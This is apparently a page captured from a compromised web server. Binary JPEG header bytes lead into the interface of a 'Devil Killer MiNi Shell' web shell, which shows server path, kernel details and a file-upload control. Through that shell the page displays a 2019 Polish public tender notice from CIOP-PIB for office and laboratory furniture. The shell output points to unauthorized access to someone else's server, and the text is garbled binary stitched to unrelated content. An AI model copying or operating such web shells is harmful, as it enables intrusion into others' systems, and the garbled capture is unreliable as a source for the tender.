JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190111/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190111/502752-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 502752-N-2019 z dnia 2019-01-11 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa i montaż mebli biurowych i laboratoryjnych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">1804600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Czerniakowska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">16</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">00701 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 613 46 19, 623 36 98</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ilteo@ciop.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 623 36 93</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ciop.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Państwowy Instytut Badawczy</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.ciop.pl - BIP - zamówienia publiczne</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy przygotować w języku polskim, z zachowaniem formy pisemnej, pod rygorem nieważności.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy, ul. Czerniakowska 16, 00-701 Warszawa</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa i montaż mebli biurowych i laboratoryjnych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">EZ/ZP-1/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa mebli wraz z montażem do pomieszczeń biurowych i laboratoryjnych w budynku ,,A" CIOP - PIB przy ul. Czerniakowskiej 16 w Warszawie. Zamówienie składa się z dwóch części:Część 1 zamówieniaPrzedmiotem zamówienia jest dostawa mebli biurowych wraz z wyposażeniem uzupełniającym do pom. nr 608 i 609.Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ.Część 2 zamówieniaPrzedmiotem zamówienia jest dostawa mebli laboratoryjnych w pom. nr 601c ÷607.Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 2 do SIWZ.Dostarczone meble muszą być fabrycznie nowe, wykonane zgodnie ze szczegółowym opisem przedmiotu zamówienia, gotowe do użytku oraz ustawione w pomieszczeniach, w miejscach wskazanych przez Zamawiającego. Zamawiający wymaga, aby oferowane meble były objęte co najmniej 60 miesięcznym okresem gwarancji obejmującej wszelkie wady konstrukcyjne i materiałowe, a także wady w funkcjonowaniu i możliwości regulacji dostarczonych mebli.Meble mają być przeznaczone do intensywnej eksploatacji w budynku biurowo-laboratoryjnym o charakterze obiektu użyteczności publicznej. Konstrukcja ma być wykonana staranie z dużą dbałością o szczegóły, z materiałów wysokiej jakości. Zamawiający wymaga aby oferowany przedmiot zamówienia spełniał wszystkie wymagania odpowiednich dokumentów normatywnych potwierdzających jakość i bezpieczeństwo użytkowania oraz wymaga, aby Wykonawca posiadał dla oferowanego przedmiotu zamówienia certyfikaty i atesty (w tym atest potwierdzający klasę higieniczności E1 płyty, z której wykonane są meble oraz zaświadczenie potwierdzające, w odniesieniu do blatów biurek i stołów, że właściwości użytkowe materiału gwarantują klasę ścieralności 3A, zgodnie z normą PN-EN 14322:2017-06). Certyfikaty, atesty powinny być wystawione przez niezależną jednostkę uprawnioną do wydawania tego rodzaju zaświadczeń. Dokumenty te Wykonawca będzie zobowiązany przedstawić w oryginale lub kopii potwierdzonej za zgodność z oryginałem - na każde żądanie Zamawiającego. W dokumentacji opisującej szczegółowo przedmiot zamówienie zamieszczono zdjęcia i rysunki poglądowe w celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, stanowią one wzór wymagań Zamawiającego. Do każdej kategorii elementów wyposażenia (przedmiotu zamówienia) należy przedstawić minimum jedną, osobną kartę katalogową (formatu min. A4), na której będzie przedstawione oferowane wyposażenie. Karta katalogowa musi zawierać nazwę wyposażenia, nazwę producenta wyposażenia, rysunek lub zdjęcie proponowanego wyposażenia (rozmiar zdjęcia pozwalający dostrzec szczegóły - optymalnie rozmiar zdjęcia to A4), wymiary oraz szczegóły techniczne wyposażenia, posiadane certyfikaty i atesty pozwalające zweryfikować, czy zaproponowany mebel spełnia wymagania Zamawiającego określone w SIWZ.Zamawiający wymaga wykonania mebli z płyt wiórowych o gęstości minimum 620kg/m3.Zamawiający zakłada następującą kolorystykę mebli:Część 1 - białe,Część 2 - jasnoszare stelaże i korpusy szafek, szare lub inne pastelowe fronty.Ostateczna kolorystyka mebli zamówienia dla blatów, stołów, biurek i szaf zostanie wybrana na podstawie próbników dostarczonych przez wybranego Wykonawcę.Wykonawca przed podpisaniem umowy przedstawi wzorniki kolorów i materiałów przewidzianych do wykonania mebli. Wybór koloru nastąpi w uzgodnieniu z Zamawiającym na bazie fabrycznego wzornika Wykonawcy. W przypadku mebli laboratoryjnych stanową one elementy stanowisk laboratoryjnych i będą kompletowane, zgodnie z opisem zawartym w Załączniku nr 2 do SIWZ.Korpusy mebli mają być skręcane. Zamawiający dopuszcza dostawę mebli montowanych w siedzibie Zamawiającego, z wyjątkiem dostawy stołów i szaf stalowych.Wykonawca jest zobowiązany do usunięcia wszelkich odpadów i nieczystości będących efektem dostaw i prac związanych z instalowaniem mebli i wyposażenia w ich miejscach docelowych.Wykonawca jest zobowiązany do dokonania obmiarów pomieszczeń w celu dostosowania wymiarów poszczególnych mebli do rzeczywistych wymiarów pomieszczeń.Wykonawca wybrany w niniejszym postępowaniu zobowiązany jest przed przystąpieniem do realizacji zamówienia dokonać wizji lokalnej pomieszczeń, w których ma znajdować się wyposażenie i przeprowadzić we własnym zakresie niezbędne pomiary, szczególnie dla potrzeb transportu mebli o dużych wymiarach. Szczegóły dotyczące terminu i sposobu odbycia wizji lokalnej zostaną omówione po podpisaniu umowy. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39100000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39130000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39180000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39181000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39111100-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39141500-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39141500-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-03-15</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:1.	Spełniają warunki udziału w postępowaniu, zgodnie z art. 22 ust. 1b ustawy Pzp:1)	posiadają zdolności techniczne lub zawodowe. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:a)	złoży wykaz wykonanych dostaw, a w przypadku świadczenia okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:dla Części 1 zamówienia - co najmniej 1 dostawę mebli biurowych o wartości nie mniejszej niż 40.000,00 zł brutto; dla Części 2 zamówienia - co najmniej 1 dostawę mebli laboratoryjnych o wartości nie mniejszej niż 300.000,00 zł brutto; i przedstawi dokumenty potwierdzające, że zamówienia te zostały wykonane lub są wykonywane należycie (forma referencji). Dokumenty tiret drugiego potwierdzają spełnienie warunku tiret pierwszego.Wzór wykazu dostaw stanowi Załącznik nr 5 do SIWZ</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1.	W celu wstępnego potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Wykonawca dołączy do oferty, aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Pzp, w formie:Oświadczenie Wykonawcy o braku podstaw do wykluczenia oraz o spełnianiu warunków udziału w postępowaniu (Załącznik nr 4 do SIWZ)W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie (Załącznik nr 4 do SIWZ) składa każdy z Wykonawców, wspólnie ubiegających się o zamówienie. Dokument ten ma potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.2.	Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających:1)	spełnienie warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Pzp:a)	Wykonawca złoży wykaz dostaw, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów- oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> 